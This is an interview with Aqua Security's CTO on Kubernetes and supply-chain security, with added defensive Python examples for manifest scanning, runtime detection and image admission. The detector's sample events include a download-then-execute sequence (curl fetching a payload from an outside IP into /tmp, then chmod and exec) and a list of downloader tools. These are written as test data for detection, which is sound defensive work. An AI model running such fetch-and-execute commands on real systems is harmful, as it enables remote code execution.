“As with many technologies, with increased usage comes increased risk of sophisticated attacks, particularly those aimed at the supply chain. This is just one area where we’re seeing an increase in attack severity on cloud native environments, or more specifically, Kubernetes”, says Amir Jerbi, Co-Founder and CTO, Aqua Security in an exclusive interview with ITSecurityWire.
ITSW Bureau: How can organizations secure the configuration of individual cloud services? How does Aqua Security enable them to achieve this?
Amir Jerbi: In the last 12-18 months, cloud adoption has accelerated exponentially, and the infrastructure itself is becoming even more complicated and increasingly difficult to configure correctly. Indeed, the complexity of configurations for cloud services, whether in single or multi-cloud environments, often exposes organizations to more severe threats. Even a single cloud service can involve multiple users, roles, and permissions, alongside varying default connections to other services that can be turned on or off.
The burden of managing these configurations, along with the added risk of unresolved misconfigurations, increases exponentially in multi-cloud environments. All the while, the consequences of letting misconfigurations continue unresolved are all too real to ignore. Attackers can exploit some misconfigurations to serve as initial access, while others can be exploited as part of an attack to move laterally across the environment or gain higher privileges. However, the bottom line is that these misconfigurations enable bad actors to attack any organization and achieve their nefarious goals, such as stealing invaluable information.
However, a security benefit of the move to cloud native development is the increased use of Infrastructure as Code (IaC) to describe computing environments. IaC is the primary way in which cloud services are provisioned, and security begins in the development of IaC.
Once things are described as code, we can shift left and secure our environments before they’re deployed. Aqua’s open source project Trivy offers IaC security scanning, covering Docker, Kubernetes, and Terraform. IaC scanning tools can be used at multiple stages of the development process, by developers as part of initial authoring or as part of a CI pipeline in a test suite.
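To make the shift-left idea concrete, here is an added example (written for this page, not Trivy’s own code or policy set) of the kind of check an IaC scanner applies to a Kubernetes manifest before it is deployed. The check IDs, the manifests and the internal registry name are constructed for the example; the manifests are embedded as Python dicts, which is the JSON form of the YAML a developer would commit, so the check runs offline in a CI test.

```python
"""Minimal Kubernetes manifest misconfiguration checker (added example, not Trivy code)."""
from typing import Dict, List

Finding = Dict[str, str]


def _pod_spec(manifest: dict) -> dict:
    """Return the PodSpec for a Pod, or for a workload that wraps one (Deployment, Job...)."""
    spec = manifest.get("spec", {})
    if manifest.get("kind") == "Pod":
        return spec
    return spec.get("template", {}).get("spec", {})


def check_manifest(manifest: dict) -> List[Finding]:
    """Return findings for one Kubernetes object. Check IDs are this example's own:
    K8S-001 privileged container
    K8S-002 allowPrivilegeEscalation not explicitly false
    K8S-003 runAsNonRoot not true (pod-level value inherited unless container overrides it)
    K8S-004 host PID/network/IPC namespace sharing
    K8S-005 image not pinned by digest and tag missing or 'latest'
    """
    findings: List[Finding] = []
    name = manifest.get("metadata", {}).get("name", "<unnamed>")
    pod = _pod_spec(manifest)

    def add(check: str, msg: str, container: str = "") -> None:
        findings.append({"check": check, "object": name, "container": container, "message": msg})

    for ns in ("hostPID", "hostNetwork", "hostIPC"):
        if pod.get(ns) is True:
            add("K8S-004", f"{ns} is enabled; workload shares the host namespace")

    pod_sc = pod.get("securityContext", {})
    for c in pod.get("containers", []) + pod.get("initContainers", []):
        cname = c.get("name", "<unnamed>")
        sc = c.get("securityContext", {})
        if sc.get("privileged") is True:
            add("K8S-001", "container runs privileged", cname)
        if sc.get("allowPrivilegeEscalation") is not False:
            add("K8S-002", "allowPrivilegeEscalation should be explicitly false", cname)
        if sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot")) is not True:
            add("K8S-003", "runAsNonRoot is not true", cname)
        image = c.get("image", "")
        if "@sha256:" not in image:
            last = image.rsplit("/", 1)[-1]          # strip registry/namespace, keep name[:tag]
            tag = last.split(":", 1)[1] if ":" in last else ""
            if tag in ("", "latest"):
                add("K8S-005", f"image {image!r} uses a mutable reference (tag {tag or 'missing'})", cname)
    return findings


def scan(manifests: List[dict]):
    """Scan several manifests; exit code 1 fails the CI job when anything is found."""
    findings = [f for m in manifests for f in check_manifest(m)]
    return findings, (1 if findings else 0)


# Constructed sample input: the same Deployment before and after hardening.
INSECURE_DEPLOYMENT = {
    "apiVersion": "apps/v1", "kind": "Deployment", "metadata": {"name": "web"},
    "spec": {"template": {"spec": {
        "hostPID": True,
        "containers": [{"name": "web", "image": "nginx:latest",
                        "securityContext": {"privileged": True}}],
    }}},
}
HARDENED_DEPLOYMENT = {
    "apiVersion": "apps/v1", "kind": "Deployment", "metadata": {"name": "web"},
    "spec": {"template": {"spec": {
        "securityContext": {"runAsNonRoot": True},
        "containers": [{"name": "web",
                        # registry.internal is a hypothetical curated registry; digest is a placeholder
                        "image": "registry.internal/base/nginx:1.25.3@sha256:" + "0" * 64,
                        "securityContext": {"privileged": False, "allowPrivilegeEscalation": False}}],
    }}},
}

if __name__ == "__main__":
    findings, rc = scan([INSECURE_DEPLOYMENT, HARDENED_DEPLOYMENT])
    for f in findings:
        print(f"{f['check']} {f['object']}/{f['container']}: {f['message']}")
    raise SystemExit(rc)
```

Run as a step in the pipeline, the non-zero exit blocks the insecure revision; the hardened manifest passes every check, which is the feedback loop the answer describes: the developer fixes the template, not the running cluster.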
ITSW Bureau: Can you suggest some effective ways for organizations to analyze events for security-sensitive changes or potentially malicious activity?
Amir Jerbi: Attackers are quick to adapt to defenses, so as security evolves so too do the attackers’ techniques. Therefore, a key step in protecting any container environment is to implement dynamic threat analysis. Static malware and vulnerability scanning is vital, but it simply cannot be an organization’s last line of defense. After all, bad actors can launch sophisticated attacks that are capable of bypassing all of these tools and file-less malware attacks are increasing in severity – consider the recent attack against Docker Hub. These types of attacks are increasingly difficult to spot and then even more difficult to decipher.
Dynamic tools match the dynamic container environment by analyzing containers as they are running. Images are run in a secure sandbox which enables any malicious elements to be uncovered either before the images are deployed or when a breach has been suspected. Once the malicious images have been detected, dynamic analysis tools can trace them back to the source. This is an important element of forensics for a cloud native environment as it enables the all-important kill chain of the attack to be established post-breach.
Companies must embrace dynamic threat analysis tools and work to build a centralized logging mechanism that can provide complete visibility from end to end. That way, leaders can feel confident that even if they are the next target of a large-scale attack, they will be able to spot it, mitigate it, and prevent it from reoccurring – IT teams can be far more proactive.
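As an added illustration of the event analysis this answer calls for (written for this page, not Aqua’s product code), the following detector replays container runtime events and flags the behaviour a static image scan cannot see: a payload fetched over the network at runtime and then executed. The event format and the sample events are constructed for the example; in practice they would come from a sandbox or runtime sensor and be forwarded to the centralized log store mentioned above.

```python
"""Stateful download-then-execute detector over container runtime events (added example)."""
import json
from collections import defaultdict
from typing import Dict, List, Set

# Tools whose file writes we treat as "fetched from the network at runtime".
DOWNLOADERS = {"curl", "wget"}
# Scratch locations a payload is typically dropped into.
SCRATCH_PREFIXES = ("/tmp/", "/dev/shm/", "/var/tmp/", "/run/")

# Constructed sample: c1 is a healthy nginx container, c2 fetches and runs a payload.
SAMPLE_EVENTS = """\
{"ts": 1, "container": "c1", "type": "exec", "comm": "nginx", "path": "/usr/sbin/nginx"}
{"ts": 2, "container": "c2", "type": "exec", "comm": "sh", "path": "/bin/sh"}
{"ts": 3, "container": "c2", "type": "exec", "comm": "curl", "path": "/usr/bin/curl", "argv": ["curl", "-s", "-o", "/tmp/.x", "http://203.0.113.9/x"]}
{"ts": 4, "container": "c2", "type": "file_write", "comm": "curl", "path": "/tmp/.x"}
{"ts": 5, "container": "c2", "type": "exec", "comm": "chmod", "path": "/bin/chmod", "argv": ["chmod", "+x", "/tmp/.x"]}
{"ts": 6, "container": "c2", "type": "exec", "comm": ".x", "path": "/tmp/.x"}
{"ts": 7, "container": "c1", "type": "file_write", "comm": "nginx", "path": "/var/log/nginx/access.log"}
"""


def _alert(severity: str, ev: dict, reason: str) -> dict:
    """One alert record; the triggering event is kept so the kill chain can be rebuilt later."""
    return {"severity": severity, "container": ev["container"], "ts": ev["ts"],
            "reason": reason, "event": ev}


def detect(lines) -> List[dict]:
    """Replay events in order and return alerts.

    State is kept per container: the set of paths a downloader wrote into a
    scratch directory. A later chmod or exec of one of those paths is the
    signal; the payload never existed in the image, so only runtime sees it.
    """
    fetched: Dict[str, Set[str]] = defaultdict(set)
    alerts: List[dict] = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        cid, path = ev["container"], ev.get("path", "")
        if ev["type"] == "file_write":
            if ev.get("comm") in DOWNLOADERS and path.startswith(SCRATCH_PREFIXES):
                fetched[cid].add(path)
                alerts.append(_alert("medium", ev, f"{ev['comm']} wrote {path} into a scratch directory"))
        elif ev["type"] == "exec":
            if path in fetched[cid]:
                alerts.append(_alert("high", ev, f"executed runtime-downloaded file {path}"))
            elif ev.get("comm") == "chmod" and any(a in fetched[cid] for a in ev.get("argv", [])):
                alerts.append(_alert("medium", ev, "runtime-downloaded file marked executable"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS.splitlines()):
        # One JSON line per alert so a central log pipeline can ingest it unchanged.
        print(json.dumps({k: v for k, v in a.items() if k != "event"}))
```

The ordering matters: the write is only medium on its own, the execution of that same file is what turns it into a high-severity alert, and because each alert carries its source event the analyst can walk back from the exec to the curl command and the remote address it contacted.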
ITSW Bureau: How can cybersecurity teams discover sophisticated malware hidden inside open-source packages as well as 3rd party images? How can it help them prevent attacks on container-based applications?
Amir Jerbi: Attackers are increasingly targeting organizations’ software supply chains, and we’re seeing them leverage third-party images as a way to compromise their victims. Here are some recommendations that can help improve security posture:
- Control access to public registries
When running containers from a public registry, treat the registry as a source with a high risk of supply chain attacks. Attackers are trying to trick developers into inadvertently pulling malicious container images by camouflaging them as popular ones. To reduce risk, create a curated internal registry for base container images and limit who can access public registries. Enact policies that ensure container images are vetted before they are included in the internal registry.
- Scan container images for malware using both static and dynamic analysis
Sophisticated attacks are often able to avoid detection when organizations use static, signature- or pattern-based scanning. For example, threat actors can evade detection by embedding code in container images that downloads malware only during runtime.
In addition to scanning any external unvetted container images for vulnerabilities, you need to also use tools that dynamically analyze the container behavior in a sandbox to identify attack vectors that wouldn’t be detected with static code scanning.
- Digitally sign container images or use other methods of maintaining image integrity
It’s important to ensure that the container images in use are the same ones that have been vetted and approved. Using the Aqua Platform, all scanned container images are automatically fingerprinted and tracked, which detects and prevents the use of non-compliant or unknown container images in your environment.
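The three recommendations above can be enforced at one point, the moment an image reference is admitted into the cluster. The following is an added example written for this page, not Aqua Platform code: it parses a Docker-style image reference, rejects anything not from an allowlisted internal registry (which is also what stops a look-alike image pulled from a public registry), requires the reference to be pinned by digest rather than a mutable tag, and compares that digest with the fingerprint recorded when the image was vetted. The registry name, digests and approved set are constructed for the example.

```python
"""Admission-style policy for container image references (added example)."""
import re
from dataclasses import dataclass
from typing import Optional, Set, Tuple

# Hypothetical curated internal registry and the fingerprints recorded at vetting time.
ALLOWED_REGISTRIES: Set[str] = {"registry.internal"}
APPROVED_IMAGES: Set[Tuple[str, str, str]] = {
    ("registry.internal", "base/nginx", "sha256:" + "a" * 64),   # placeholder digest
}
_DIGEST = re.compile(r"sha256:[a-f0-9]{64}")
_REPO = re.compile(r"[a-z0-9][a-z0-9._/-]*")


@dataclass(frozen=True)
class ImageRef:
    registry: str
    repo: str
    tag: Optional[str]
    digest: Optional[str]


def parse_ref(ref: str) -> ImageRef:
    """Parse [registry[:port]/]repo[:tag][@sha256:hex] using Docker's rule that the
    first path component is a registry only if it contains '.' or ':' or is 'localhost'."""
    rest, digest = ref, None
    if "@" in rest:
        rest, digest = rest.split("@", 1)
        if not _DIGEST.fullmatch(digest):
            raise ValueError(f"malformed digest in {ref!r}")
    first, _, tail = rest.partition("/")
    if tail and ("." in first or ":" in first or first == "localhost"):
        registry, path = first, tail
    else:
        registry, path = "docker.io", rest
        if "/" not in path:
            path = "library/" + path          # docker.io implicit namespace
    name, _, tag = path.rpartition(":")
    if not name or "/" in tag:               # no tag present (colon, if any, was in a path component)
        name, tag = path, None
    if not _REPO.fullmatch(name):
        raise ValueError(f"malformed repository name in {ref!r}")
    return ImageRef(registry, name, tag, digest)


def evaluate(ref: str) -> Tuple[bool, str]:
    """Return (allowed, reason) for one image reference."""
    try:
        img = parse_ref(ref)
    except ValueError as exc:
        return False, str(exc)
    if img.registry not in ALLOWED_REGISTRIES:
        return False, f"registry {img.registry} is not allowlisted; pull through the curated registry"
    if img.digest is None:
        return False, "image must be pinned by digest; tags are mutable and can be re-pointed"
    if (img.registry, img.repo, img.digest) not in APPROVED_IMAGES:
        return False, "digest does not match any vetted image fingerprint"
    return True, "allowed"


if __name__ == "__main__":
    for candidate in ("nginx:latest",                                   # public registry, look-alike risk
                      "registry.internal/base/nginx:1.25.3",            # internal but tag-only
                      "registry.internal/base/nginx@sha256:" + "a" * 64,  # vetted fingerprint
                      "registry.internal/base/nginx@sha256:" + "b" * 64):  # unknown digest
        ok, why = evaluate(candidate)
        print(f"{'ALLOW' if ok else 'DENY ':5} {candidate}: {why}")
```

A real deployment would back APPROVED_IMAGES with the scanner’s database and run this logic in an admission controller, but the decision order is the point: origin first, immutability second, identity last, so a mutable tag can never be the thing that passes vetting.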
ITSW Bureau: What trends can enterprises expect to see in terms of cloud security posture management?
Amir Jerbi: As with many technologies, with increased usage comes increased risk of sophisticated attacks, particularly those aimed at the supply chain. This is just one area where we’re seeing an increase in attack severity on cloud-native environments, or more specifically, Kubernetes. In fact, in the last year we’ve seen security professionals being asked to expand their participation within the development and production environments.
What we have also seen over the past 12 months or so is DevOps teams are now being asked to include more security practices in their work, and security teams are being asked to have more visibility and control into what DevOps are doing – this overlap is creating a new kind of team – what some call DevSecOps.
Naturally, we are seeing the emergence of new monitoring tools to prevent the more severe threats from happening; companies are looking to be more ‘proactive’ with regards to their cybersecurity. One to watch is eBPF – a cutting-edge technology with the ability to run sandboxed programs in the Linux kernel without loading kernel modules or altering kernel source code. Developers can run tests and checks at speed without worrying about unintended consequences. In fact, eBPF makes it possible to spot unusual activity and mitigate the danger of an attack. Given the future of work and how businesses are now operating, these monitoring tools will prove vital in the coming months.
Amir is the Co-Founder and CTO of Aqua Security where he brings over 20 years of security software experience in technical leadership positions. Prior to Aqua, he was a Chief Architect at CA Technologies, in charge of the host-based security product line, building enterprise grade security products for Global 1000 companies. Amir has 14 cloud and virtual security patents under his belt.